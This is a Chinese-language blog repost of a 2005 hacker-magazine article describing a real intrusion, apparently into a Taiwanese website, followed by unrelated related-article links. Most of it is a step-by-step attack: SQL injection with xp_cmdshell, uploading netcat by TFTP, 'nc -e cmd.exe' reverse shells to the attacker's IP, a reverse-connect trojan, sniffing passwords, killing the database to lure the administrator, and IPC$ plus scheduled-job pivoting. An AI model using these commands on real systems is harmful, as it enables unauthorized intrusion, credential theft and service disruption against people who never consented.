记一次艰苦的入侵

原创 2005年05月12日 07:35:00
作者:勇哥儿  来源于:潮阳人网站  发布时间:2005-4-8 10:54:11

本文已在黑客防线05年第3期发表
04年不平凡的一年,各种漏洞相继发现,各种入侵技巧也应运而生,原本固若金汤的机器,在新的漏洞面前,也变的弱不禁风。牛人发现并编写的Serv-u的溢出程序,为提升系统权限大开方便之门,NBSI把SQL注入发挥的淋漓尽致,PHP注入也日趋成熟,哪位怪才发现的上传漏洞在很多脚本中也都花样倍出,像DV,DZ等等大名鼎鼎的论坛也是漏洞叠报,数家著名公司被敲诈,黑客组织也是明争暗斗,虚拟主机也饱受旁注困扰。攻与防就像矛与盾,从某种意义上来说,攻就是防,防就是攻!“千里之堤,溃于蚁穴”,一个小小的漏洞就可以攻克一台机器,甚至占领整个内部网络。本文以一台机器为突破口,然后如何利用内网其它机器做跳板,最后控制目标机器(如果说利用一台机器上的某个站点来控制其它站点叫直接旁注的话,偶想把利用同一网内最弱的一台机器,来达到控制最强的机器叫问接旁注,比渗透入侵偶觉着好听点,其实方法很多牛人早用烂了,偶在这里现丑了)。

一、通过SQL注入漏洞,反向连接数据库机器。

利用NBSI扫描发现存在SQL注入漏洞,而且还是SA权限,如图1

利用NBSI的DOS执行命令,输入ipconfig –all 发现网址与WEB服务器不同,但是从网关上来看是在同一网段内。执行netstat –an查看数据库服务器所开的端口,发现很多1433端口都是WEB服务器连接,21,23,80端口没!利用NBSI的浏览目录功能,没发现机器上存在PCANYWHERE和SERV-U(利用它们可以远程控制,提升权限,或猜测口令)。利用net start 命令没发现如瑞星,KV等杀毒软件或防火墙服务,然后利用HSCAN1。2和NMAP3。

7扫描数据库服务器的外网IP进,竟然没扫到一个开放的端口!(估计机器上装了硬件>防火墙!)对付防火墙,偶想到了反向链接,在本地开了一个TFTP,利用命令, tftp –I ip get nc.exe 很幸运的上传了一个NC上去,利用同样的方法也上传了一个MT。EXE(MT.EXE是一个网络管理方面的软件,依照yy3的说法,也就是 "七拼八凑来的,纯粹是图个方便。"可是这个方便个真的是太方便了,仅40K的一个程序,但是集合了近四十种的命令于一身)上去。也可以利用FTP命令,把FTP命令用ECHO命令写进一个文件里面,最后在用FTP –S:FILENAME来实现文件的下载。在本机利用NC监听66端口,命令如下:NC –L –P 66 ,远程机器上执行:

NC –E CMD。EXE  IP  66

不一会儿,一个SHELL就出来了(还是在这里面运行命令爽啊,在NBSI里憋死了,有时在NBSI里执行命令时会出现“意外数据”,还要被破在游览器里执行_cmdshell%20'dos">http://www.***.com.tw/***/***.asp?  mode=1&ID=256;exec%20master..xp_cmdshell%20'dos command';--)

利用net view  命令查看共有三台机器!如图2 

在利用命令:NET VIEW //机器名  时得到的内容为空,看来是没共享目录啊!
二、上传反弹、监听木马显奇功。
利用MT。EXE –SYSINFO命令显示出数据库服务的系统信息,网卡信息,配置信息,和所安装的软件信息。如图3(只截了系统信息)

图3
是WIN2003怪不得用MT –FINDPASS命令没显出密码来,它只显示的2K的密码。利用命令

mt –netget http://www.***.com/findpass2003.exe(mt  -netget <url> <filename to saved>       ---Download from http/ftp.)下载到本地一个看WIN2003密码的软件!!运行findpass2003.exe后没有在内存中找到密码!(看来的想办法让管理员登录了!哈哈)运行命令: 

mt –netget  http://www.***.com/hacan120.rar   hscan.rar 下载一个HSCAN1。2进去,利用同样的方法又下载进去一个UNRAR。EXE然后执行命令:unrar.exe x hscan.rar 这样就把HSCAN。RAR解压到HSCAN目录当中了!可以利用HACSN1。2版本的DOS命令进行内网扫描,命令如下:hscan -h www.target.com -all –ping扫完其余两台以后没发现任何弱口令,但发现它们在内网中开了很多端口,如:21,80,135,139,3389 等
注意:HSCAN扫描完了以后,会生成报告,自动用浏览器打开,应该利用MT –PSLIST  和MT –PSKILL把这个浏览器关掉!即然开了3389能不能利用端口重定向,把它定向到数据库这台机器上呢,经过实践利用

mt -redirect <TargetIP> <TargetPort> <ListenPort>   ----TCP port redirector. 

和利用FPIPE都没有成功(定向后,用NETSTAT –AN命令看是端向成功,但是在外网还是没法访问)哪数据库这台机器能不能利用带反弹型的图形木马来控制屏幕呢?实践证明利用神气儿,灰鸽子,溯雪都失败了!看来只能装DOS版的后门了,哪试试APR欺骗如何?因在DOS下没法安装图形界面的WINPCAP,所以ARPSINFFER。EXE无法运行!(后来自己做了一个DOS版的)这台机器上除了操作系统,数据库,WIN2003补丁外什么都没装,难道真的就没有办法了吗?这时偶想到了一个木马,一个女黑客编写的,即有反向连接功能,又有监听功能,是什么呢?聪明的朋友,你猜到了吗?她就是大名鼎鼎,如雷贯耳,威名远波,无所不知的WOLLF(偶好喜欢她啊! 哈哈)运行

WOLLF –SETUP

后做一个反向链接的木马,偶选择的是反向链接所取的IP放在一个HTTP空间的文件中!制作好后,同样利用MT。EXE –NETGET命令下载到数据库服务器当中,运行后,它会自动向你的HTTP空间中存放的文件中去取反向链接的IP和端口,这时你可以在本机上用NC –L –P PORT 慢慢等待,一会以后,反向连接成功了,输密码进入吧!如图4

进入后,执行命令:SNIFF <Log_file> (她可以监听 ftp/smtp/pop3/http四种密码经过网卡的 )findpass2003.exe不是还没找到密码吗?这时候,利用MT.EXE –PSKILL命令把它的数据库停掉,偶就不信管理员不来!在WOLLF环境下执行EXIT退出(但是监听程序还是在运行的,如果执行QUIT后,就不监听了),累死偶了,睡觉去了!
一觉醒来,太阳都老高了,睡懒觉可真舒服啊!在倒连上去看看有没有抓到有价值的信息,先输入命令:SNIFF_STOP把监听停下,在利用WOLLF带的GET命令把监听的文件下载下来,哈,收获可真不小如图5所示:

图5所示监听到固若金汤的WEB服务器的一个80端口的用户名和密码,登录上一看,原理是一个会员的!还监听到一台机器的21端口的用户名和密码了和这台机器的25端口的一个MAIL,查看其IP后发现它就是上面利用NET VIEW看到的三台机器中的一台,就叫它“邮件WEB服务器”吧,在外网扫描还发现它开了80端口!看来这台机器有两个作用:一是作为邮件服务器,另一个作用就是开了80端口,上面放了部网站内容,而主要网站的内容则在哪台固若金汤的WEB服务器上(在外网扫描它进,只开了80端口,真够狠!哪台邮件WEB服务器对外网也仅开了21,25,80,110四个端口)先别忙登录啊!可不要忘了哪个findpass2003命令啊!如图6:

利用net user username看了一下这个用户是管理员啊!密码设置的很变态字母数字特殊字符都有,管理员一般都有一个习惯,所有机器上的管理员的密码都相同,后来验证,果然如此!
得到用户名和密码后,试图在数据库服务器上对另外两台机器执行命令:net use //IP/admin$ passwd /user:username 均没有成功!
三、邮件WEB服务器做跳板,直捣黄龙;
FTP登录邮件WEB服务器,还是Serv-U FTP-Server v2.5k,会不会能溢出呢?登录成功后,上传一个海顶2005和NC。EXE上去,再次反向链接如图:7

利用IPC漏洞(在这台机器上对WEB服务器竟然能成功!哈哈)
1.net use //WEB服务器/admin$ password /user: username
其中username,password为连接远程主机时提供的用户名与密码
2.copy x:/nc.exe //WEB服务器/admin$
拷贝NC到WEB服务器上
3.net time //远程主机名
显示WEB服务器当前的时间假如为09:12
3.at //WEB服务器 09:14 nc.exe –e cmd.exe  218.***.***.165 99
在09:14分WEB服务器自动NC反向链接偶的机器的99端口。如图8

2分钟过去,终于成功了,终于进入到哪台固若金汤的WEB服务器里面了!成功后界面如图9:

其中在反弹的SHELL中利用XYZCMD。EXE这个工具进行在次登录时,没有成功,也就是SHELL中在出SHELL时没有成功,看来是不支持数据的二交互。图中同现的网址已做处理,如有雷同,纯属巧合。希望本方法对大家有所帮助,不管是攻还是防!!

记一次艰苦的刷机历程,nexus7 刷cm12 nightly版,刷入gapps

背景:之前一直用android原生的系统,正好手里有台七太子,亲儿子么一直用着原生,最近随着android5.0的到来也随着更新了,更新之后用着还行,除了一些app不兼容之外,最让我受不了的就是掉电和...

重磅-记一次惊心动魄的阿里云服务器被入侵过程定位

现象 某天登陆自己的阿里云服务器,发现有很多命名奇怪的进程:  定位步骤一:查看进程文件位置 通过命令 ll /proc/pid 查看进程文件exe执行路径,打开后整个人都惊呆了!mysql目...

记一次Linux系统被入侵的排查过程(一)

事件起因:某晚,22点左右,我在与某君电话中,突然发现电脑上QQ自动离线,然后又自动登录,开始以为QQ被盗了。电话完后,发现是网络不稳定引起的,由于小区宽带上个月才进电信光纤网,存在一些不稳定因素,是...

你BT我更BT!记一次入侵BT服务器

http://arch.pconline.com.cn//pcedu/soft/virus/hkgfz/0510/710296.html

记一次基于mysql的入侵Simple

一切从MS15-034/CVE-2015-1635漏洞开始 通过nmap扫描发现内网中的一台机器存在漏洞CVE-2015-1635 于是发起一次BSOD的攻击 So it’s just ...

记一次基于mssql的入侵

通过扫描发现目标机器mssql存在弱口令

一次垃圾地入侵日记.php

  • 2008年12月15日 12:30
  • 46KB
  • 下载

记一次网易前端面试

  • 2017年12月04日 14:36
  • 29KB
  • 下载

北上广深打拼的游子,即便过得艰苦,为何义无反顾?

北上广深打拼的游子,即便过得艰苦,为何义无反顾? 2015-04-03 极客学院 曾经有网友在知乎提问: [问题]:为什么现在很多年轻人愿意到北上广深打拼...
  • lsgqjh
  • lsgqjh
  • 2015年04月09日 00:44
  • 923
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:记一次艰苦的入侵
举报原因:
原因补充:

(最多只允许输入30个字)